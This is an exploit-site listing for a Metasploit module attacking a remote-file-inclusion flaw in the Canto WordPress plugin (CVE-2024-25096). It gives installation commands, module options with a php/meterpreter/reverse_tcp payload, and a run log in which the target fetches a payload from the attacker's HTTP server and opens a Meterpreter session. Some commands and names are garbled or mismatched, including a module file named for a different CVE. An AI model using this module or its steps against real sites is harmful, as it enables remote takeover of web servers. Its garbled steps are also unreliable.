Exploit for Code Injection in Canto CVE-2024-25096

Name: Exploit for Code Injection in Canto CVE-2024-25096
Rating: 5 (160 reviews)
2026-03-01 | CVSS 10.0
## https://sploitus.com/exploit?id=E7613C31-BA12-5A66-B3CC-A7ADFB588EE2
# Metersploit exploit module canto RCE CVE-2024-25096

This is a PoC exploit of the Canto RCE CVE-2024-25096 for Metasploit.

## Usage

Download the exploit and add it to the metasploit module folder.
Reload Metasploit and select the payload.

```bash
git exploit
cp explit/rce_exploit_cve_2023_3452.rb ~/.msf4/modules/exploits/
msfconsole
reload_all
search rce_exploit_cve_2023_3452
use 0
```
set the values of the required variables

```bash
Module options (exploit/rce_exploit_cve_2023_3452):

   Name        Current Setting            Required  Description
   ----        ---------------            --------  -----------
   Proxies                                no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, http, socks5h
   RHOSTS      192.168.0.3                yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT       8080                       yes       Port
   SRVHOST     0.0.0.0                    yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT     9998                       yes       The local port to listen on.
   SSL         false                      yes       Use SSL
   SSLCert                                no        Path to a custom SSL certificate (default is randomly generated)
   TARGETFILE  get.php                    yes       Vulnerable PHP file
   TARGETURI   /wp-content/plugins/canto  yes       Path to cantos root directory
   URIPATH                                no        The URI to use for this exploit (default is random)
   VHOST                                  no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.0.2   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wordpress cantp plugin > run
[*] Started reverse TCP handler on 192.168.0.2:4444 
[*] Starting HTTP server...
[*] Using URL: http://192.168.0.2:9998/Rj5Nh2b
[*] Triggering RFI...
[*] 192.168.0.3   my_expi - Sending admin.php payload
[*] Sending stage (42137 bytes) to 192.168.0.3
[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.3:42234) at 2026-02-28 23:40:27 +0100
```